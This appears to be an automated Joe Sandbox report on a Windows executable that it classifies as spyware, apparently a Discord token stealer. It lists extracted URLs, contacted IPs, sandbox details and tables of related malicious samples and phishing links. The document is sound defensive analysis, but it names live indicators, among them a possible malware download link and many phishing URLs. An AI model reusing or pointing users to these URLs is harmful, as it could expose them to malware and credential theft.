                                                                                      http://www.firmaprofesional.com/cps0PAP46E1UkZ.exe, 00000001.00000003.424468024.000001C631627000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.453510954.000001C631430000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.445945058.000001C62E022000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.424367351.000001C631604000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.434555431.000001C63036C000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.425213932.000001C63164E000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.442684908.000001C62E021000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.423259982.000001C6315E1000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.444604502.000001C630370000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.425056427.000001C6315F2000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.444967727.000001C62E025000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.423511280.000001C6315F7000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.448731513.000001C630370000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.442214389.000001C62E01C000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.425121775.000001C631627000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.424929139.000001C6315E5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.428168490.000001C630368000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.441437204.000001C62E004000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=referralPAP46E1UkZ.exe, 00000000.00000003.376542743.00000293619B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://netflix.com)PAP46E1UkZ.exe, 00000001.00000002.450711951.000001C6309B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		low
                                                                                          https://gmail.com)PAP46E1UkZ.exe, 00000001.00000002.450711951.000001C6309B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		low
                                                                                          http://crl.securetrust.com/SGCA.crl0PAP46E1UkZ.exe, 00000001.00000003.432609108.000001C630A68000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.444494172.000001C630A7B000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.430065825.000001C630A64000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.440966927.000001C630A76000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.431108288.000001C630A65000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.451052595.000001C630A7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://outlook.com)PAP46E1UkZ.exe, 00000001.00000002.450711951.000001C6309B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		low
                                                                                          http://crl.securetrust.com/SGCA.crlGPAP46E1UkZ.exe, 00000001.00000003.423731738.000001C631542000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.425436456.000001C631542000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.453716516.000001C631542000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0PAP46E1UkZ.exe, 00000000.00000003.372159145.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.drfalse
                                                                                            		high
                                                                                            https://w3c.github.io/html/sec-forms.html#multipart-form-dataPAP46E1UkZ.exe, 00000001.00000003.441725392.000001C6301A2000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.447510481.000001C6301A2000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.428039829.000001C63019E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.quovadisglobal.com/cps0PAP46E1UkZ.exe, 00000001.00000003.433435952.000001C6301AB000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.440981379.000001C6301AC000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.443036156.000001C6301AE000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.428039829.000001C63019E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://binance.com)PAP46E1UkZ.exe, 00000001.00000002.450711951.000001C6309B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		low
                                                                                              https://epicgames.com)zPAP46E1UkZ.exe, 00000001.00000002.451146498.000001C630ACC000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.426136995.000001C630AB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		low
                                                                                              https://cryptography.io/en/latest/changelog/PAP46E1UkZ.exe, 00000000.00000003.376124171.00000293619B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://youtube.com)zPAP46E1UkZ.exe, 00000001.00000002.451146498.000001C630ACC000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.426136995.000001C630AB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		low
                                                                                                https://spotify.com)PAP46E1UkZ.exe, 00000001.00000002.450711951.000001C6309B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		low
                                                                                                https://img.shields.io/badge/code%20style-black-000000.svgPAP46E1UkZ.exe, 00000000.00000003.376542743.00000293619B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://spotify.com)zPAP46E1UkZ.exe, 00000001.00000002.451146498.000001C630ACC000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.426136995.000001C630AB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		low
                                                                                                  https://mail.python.org/mailman/listinfo/cryptography-devPAP46E1UkZ.exe, 00000000.00000003.376124171.00000293619B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://crl4.digicePAP46E1UkZ.exe, 00000000.00000003.367378358.00000293619B5000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000000.00000003.366964411.00000293619B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://optifine.net)zPAP46E1UkZ.exe, 00000001.00000002.451146498.000001C630ACC000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.426136995.000001C630AB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		low
                                                                                                    https://yahoo.com)zPAP46E1UkZ.exe, 00000001.00000002.451146498.000001C630ACC000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.426136995.000001C630AB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		low
                                                                                                    https://discord.com/api/users/PAP46E1UkZ.exe, 00000001.00000002.451146498.000001C630ACC000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000002.450711951.000001C6309B0000.00000004.00001000.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.426136995.000001C630AB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://api.gofile.io/getServerPAP46E1UkZ.exe, 00000001.00000002.450711951.000001C6309B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://steam.com)PAP46E1UkZ.exe, 00000001.00000002.450711951.000001C6309B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		low
                                                                                                      http://www.cert.fnmt.es/dpcs/jPAP46E1UkZ.exe, 00000001.00000003.424367351.000001C6315EA000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.423259982.000001C6315E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://cdn.discordapp.com/attachments/857263650707603456/1114484262519984158/DiscordSetup.exeT)PAP46E1UkZ.exe, 00000001.00000002.451146498.000001C630ACC000.00000004.00000020.00020000.00000000.sdmp, PAP46E1UkZ.exe, 00000001.00000003.426136995.000001C630AB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          162.159.128.233
                                                                                                          		ptb.discord.comUnited States
                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                          51.178.66.33
                                                                                                          		api.gofile.ioFrance
                                                                                                          		16276OVHFRfalse
                                                                                                          51.91.236.255
                                                                                                          		scan-echo.onlineFrance
                                                                                                          		16276OVHFRfalse
                                                                                                          159.89.102.253
                                                                                                          		geolocation-db.comUnited States
                                                                                                          		14061DIGITALOCEAN-ASNUSfalse
                                                                                                          162.159.133.233
                                                                                                          		cdn.discordapp.comUnited States
                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                          173.231.16.76
                                                                                                          		api4.ipify.orgUnited States
                                                                                                          		18450WEBNXUSfalse
                                                                                                          51.38.43.18
                                                                                                          		unknownFrance
                                                                                                          		16276OVHFRfalse

                                                                                                          General Information

                                                                                                          Joe Sandbox Version:37.1.0 Beryl
                                                                                                          Analysis ID:881081
                                                                                                          Start date and time:2023-06-03 12:16:13 +02:00
                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                          Overall analysis duration:0h 9m 5s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                          Number of analysed new started processes analysed:6
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • HDC enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample file name:PAP46E1UkZ.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal72.troj.spyw.evad.winEXE@6/138@7/7
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          HDC Information:
                                                                                                          • Successful, ratio: 100% (good quality ratio 87.5%)
                                                                                                          • Quality average: 65%
                                                                                                          • Quality standard deviation: 33.4%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 99%
                                                                                                          • Number of executed functions: 66
                                                                                                          • Number of non-executed functions: 141
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Stop behavior analysis, all processes terminated

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          No simulations

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          162.159.128.233rTR013.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            https://colabot-network.com/Get hashmaliciousUnknownBrowse
                                                                                                              KwW85078PI.exeGet hashmaliciousAxlockerBrowse
                                                                                                                EQ7ZcyBU0R.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                  VespyGrabber.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                    New_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      download.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        oribin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          Calculator.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                            WindowsPlug.exeGet hashmaliciousUnknownBrowse
                                                                                                                              Updated_Invoice_and_SOA.pdf.jsGet hashmaliciousVector StealerBrowse
                                                                                                                                PURCHASE_ORDER.pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                                                                  UG9qipNNYt.exeGet hashmaliciousVector StealerBrowse
                                                                                                                                    [750p]_BIG_GEORGE_FOREMAN.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      toba22bbc.exeGet hashmaliciousVector StealerBrowse
                                                                                                                                        Shipping_documents.pdf.jsGet hashmaliciousVector StealerBrowse
                                                                                                                                          GalacticShooter (3).exeGet hashmaliciousUnknownBrowse
                                                                                                                                            GalacticShooter (3).exeGet hashmaliciousUnknownBrowse
                                                                                                                                              choo.bin.exeGet hashmaliciousVector StealerBrowse
                                                                                                                                                aHESmFfQeP.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                  51.178.66.33Creal.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                    XxogfMIH1M.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                      QmF9bcCME5.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                        c0PZAXHMCpdh5F1.exeGet hashmaliciousClipboard Hijacker, Redline Clipper, StealeriumBrowse
                                                                                                                                                          Vanta Installer.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                            xcwHzL3U24.exeGet hashmaliciousBazaLoaderBrowse
                                                                                                                                                              build.exeGet hashmaliciousClipboard Hijacker, StealeriumBrowse
                                                                                                                                                                https://file10.gofile.io/download/f64c8d71-6572-43c5-94ad-c5b224d8fbe6/Lucia%20Javorcekova.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                  Mirai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    SecuriteInfo.com.Win32.Trojan-Stealer.Cordimik.0P9K5X.15421.10346.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                                      SecuriteInfo.com.Win64.Evo-gen.1195.20229.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        4b7af02af4ab2601c9006b3734bce41adf72f4f212765.exeGet hashmaliciousAmadey, RedLine, SmokeLoaderBrowse
                                                                                                                                                                          Image_Of_Victim.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                                            g0Cm482vVa.exeGet hashmaliciousStealeriumBrowse
                                                                                                                                                                              file.exeGet hashmaliciousCryptOne, Djvu, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                file.exeGet hashmaliciousCryptOne, Djvu, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousBabuk, CryptOne, Djvu, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                    3yfbJOgQbS.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                      70j6RO5su8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        conhost.exeGet hashmaliciousXmrigBrowse

                                                                                                                                                                                          Domains

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          api4.ipify.orgRemittance Advice.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 104.237.62.211
                                                                                                                                                                                          03638199.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                          • 173.231.16.76
                                                                                                                                                                                          file.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                          • 64.185.227.155
                                                                                                                                                                                          Request_For_Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                          • 64.185.227.155
                                                                                                                                                                                          41570002689_20230602_05352297_HesapOzeti.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                          • 173.231.16.76
                                                                                                                                                                                          SOA.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 64.185.227.155
                                                                                                                                                                                          EML_MCLADEMAF310523000315PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                          • 104.237.62.211
                                                                                                                                                                                          Halkbank_Ekstre_20230531_073809_405251-PDF.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                          • 104.237.62.211
                                                                                                                                                                                          Telex-23200205.7zGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                          • 64.185.227.155
                                                                                                                                                                                          Telex-23200205.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                          • 64.185.227.155
                                                                                                                                                                                          Remittance Advice.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 173.231.16.76
                                                                                                                                                                                          filr.docx.docGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                          • 104.237.62.211
                                                                                                                                                                                          koUUC19xnw.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                          • 104.237.62.211
                                                                                                                                                                                          Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                          • 64.185.227.155
                                                                                                                                                                                          IMG_3151_87031pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                          • 64.185.227.155
                                                                                                                                                                                          https://fb-restriction-case-f4036.web.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 173.231.16.76
                                                                                                                                                                                          BW2R2Vz2b6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                          • 64.185.227.155
                                                                                                                                                                                          Swift_copy.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                                          • 64.185.227.155
                                                                                                                                                                                          Afhij6UIk4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                          • 64.185.227.155
                                                                                                                                                                                          Nz2qHoLkoX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                          • 104.237.62.211
                                                                                                                                                                                          ptb.discord.comA4AxThCBqS.exeGet hashmaliciousNanocore, Luna Logger, Umbral StealerBrowse
                                                                                                                                                                                          • 162.159.136.232
                                                                                                                                                                                          SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exeGet hashmaliciousCKS Stealer, Spark RATBrowse
                                                                                                                                                                                          • 162.159.137.232
                                                                                                                                                                                          SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exeGet hashmaliciousCKS Stealer, Spark RATBrowse
                                                                                                                                                                                          • 162.159.138.232
                                                                                                                                                                                          Lunar_Builder.exeGet hashmaliciousItroublveBOT StealerBrowse
                                                                                                                                                                                          • 162.159.138.232
                                                                                                                                                                                          v5u7AiCLzw.exeGet hashmaliciousNitroRansomwareBrowse
                                                                                                                                                                                          • 162.159.138.232
                                                                                                                                                                                          NPHzyKe1zJ.exeGet hashmaliciousNitroRansomwareBrowse
                                                                                                                                                                                          • 162.159.137.232
                                                                                                                                                                                          ONtIB38CQZ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                          t5UFndKp9h.exeGet hashmaliciousNitroRansomwareBrowse
                                                                                                                                                                                          • 162.159.128.233

                                                                                                                                                                                          ASNs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          CLOUDFLARENETUScu0Mrrvtyr.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                          • 198.41.197.88
                                                                                                                                                                                          https://realtor01.blob.core.windows.net/009909/owa.html?sp=r&st=2023-06-01T22:24:21Z&se=2023-07-01T06:24:21Z&spr=https&sv=2022-11-02&sr=b&sig=kUbigEZxMmuIVmUW%2F%2F0t1bwgnT3IyCvWVlUB8Y3WRx4%3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                          http://photo.22lr2.com/qBidYxmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 162.247.243.29
                                                                                                                                                                                          https://msha.ke/timsharefileproGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 172.67.145.40
                                                                                                                                                                                          http://sicurezza.info.85-217-144-202.cprapid.com/isp/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.22.1.204
                                                                                                                                                                                          http://acikdeniz.mobildeniz.giris.52-27-117-178.plesk.page/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.18.70.113
                                                                                                                                                                                          http://lp.kanui.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 188.114.97.7
                                                                                                                                                                                          http://chasehiggins.com/New/Auth/i5gdfx/aXNva29sb3NreUByaGEtY2VudHJhbC5tYi5jYQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                          https://budsmokerz.com/new/auth/nhqyua/bWVyaWNrc29uQG1jc2hhbmVzLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                          https://torinkony.com/new/new/nLgOZ/cHJpc2NpbGxhLmNodUBpb25ncm91cC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                          https://pub-78c48461173848d2b67da72f0d69ccd5.r2.dev/xelect.html.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 104.18.2.35
                                                                                                                                                                                          https://pub-4fd921e4cf024eb6a1c7da9ea51523ea.r2.dev/Diceyencoded.html#3mail@b.cGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                          http://netflix-clone-qk0b7xk4o-anirudhsinghbhadauria.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.16.85.20
                                                                                                                                                                                          http://www.thebluebook.com/wsnsa.dll/WService=wsbrk1/comm/redirect.p?account=4223432&seq=0&compno=1601231&userno=2&trackM=m:13_31%5Et:28_34&trackT=t:28_34&trackdt=01252021&reDirTo=https%3A%2F%2Fecourseimplementers.com%2FNew%2FAuth%2Fsf_rand_string_lowercase6%2F%2F%2F%2FYWxhbS5hbnNhcmlAZXhwLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 1.1.1.1
                                                                                                                                                                                          https://bafybeidvtuuajd3mft75wfm7rwr2wnqg5uwn53hqlnfu3js6brjwwdgp4q.ipfs.dweb.link/W3MDX5.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                                          https://bit.ly/45IO2AQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 188.114.97.7
                                                                                                                                                                                          https://coinbasedex.top/?shiny%23/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 188.114.97.7
                                                                                                                                                                                          http://offroadfreedom.com/free-virginia-car-bill-sale-template/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 188.114.97.7
                                                                                                                                                                                          https://coindex.men/?shiny%23/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.21.55.35
                                                                                                                                                                                          https://ppc.us-east-1.linodeobjects.com/verc-verification-login-authxxtes.htm?email=webtfef@zcb5330.ucf.fehGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                                          OVHFR9uRZoy7BB9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                          • 37.59.153.101
                                                                                                                                                                                          LQZwOQkZU6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                          • 91.134.25.189
                                                                                                                                                                                          https://etelafesmak.com/email/verification/sf_rand_string_lowercase6////bWdyYW50aGFtQG9zdWdpdmluZy5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 5.135.243.203
                                                                                                                                                                                          http://googlle.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 147.135.143.184
                                                                                                                                                                                          PO456.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                          • 217.182.15.139
                                                                                                                                                                                          TQld4iiPhZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                          • 87.98.150.35
                                                                                                                                                                                          SHIPPING.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                          • 51.91.236.255
                                                                                                                                                                                          Tf69031f9d912f35aab68.exeGet hashmaliciousGurcu StealerBrowse
                                                                                                                                                                                          • 51.77.125.62
                                                                                                                                                                                          1685680693-110348-5383-33912-1.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 51.89.2.129
                                                                                                                                                                                          TeamViewer 15.40.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 149.56.240.27
                                                                                                                                                                                          file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                          • 51.210.170.199
                                                                                                                                                                                          http://t.a1.hilton.com/r/?id=h9b6daf6e,164913bc,13948af1&p1=//delarealtyltd.com/as/ms/Y2hlcnlsX2dvY2hpc0BiYXlsb3IuZWR1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 51.77.52.109
                                                                                                                                                                                          1685648283cfab72d37ad10cd3c3bca88d5a9de18f31b220a4303711fe3755e7034c85ab83785.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                          • 147.135.253.106
                                                                                                                                                                                          168564852422e6237344c81a5337a6e5ad5916e6aaf01af808ccefd9da42487c6689c39e1a931.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                          • 54.36.109.179
                                                                                                                                                                                          http://l.billing01.email-allstate.com/rts/go2.aspx?h=709721&tp=i-1NHD-A2-a2U-2j2Feo-1z-7txXH-1c-GnMZ-2gv4cA-l88641NDv1-1cwJtA&x=h13hp8.codesandbox.io%2F%3Fmandate=a3NwcmFkbGluZ0Bod2xvY2huZXIuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 51.38.57.100
                                                                                                                                                                                          http://www5.dmpcalibermail.com/caliberamp/main/index.php?action=t&tag=https%3A%2F%2Fwww.newrezwholesale.com%2F%3Futm_source%3Damp%26amp%3Butm_medium%3Demail%26amp%3Butm_campaign%3Dfooter_logo%26amp%3Butm_content%3D%5Bemail%3Acampaign_name%5D&id=3001056&contact_uuid=d0cc097f-162a-4057-a799-b15f2e95733b&dest=https://pus8vs.codesandbox.io/?mandate=daryl@healthesystems.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 51.38.57.100
                                                                                                                                                                                          http://www5.dmpcalibermail.com/caliberamp/main/index.php?action=t&tag=https%3A%2F%2Fwww.newrezwholesale.com%2F%3Futm_source%3Damp%26amp%3Butm_medium%3Demail%26amp%3Butm_campaign%3Dfooter_logo%26amp%3Butm_content%3D%5Bemail%3Acampaign_name%5D&id=3001056&contact_uuid=d0cc097f-162a-4057-a799-b15f2e95733b&dest=https://pus8vs.codesandbox.io/?mandate=mihir.shukla@automationanywhere.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 51.38.57.100
                                                                                                                                                                                          ingrid_6_6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 164.132.168.8
                                                                                                                                                                                          file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                          • 51.210.170.199
                                                                                                                                                                                          settings.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                          • 51.68.190.80

                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                          No context

                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_ARC4.pydnpp.8.5.3.Installer.x64342423423423424242423423424.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            VespyTokengrabber20.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              FlappyBird.exeGet hashmaliciousUnknownBrowse
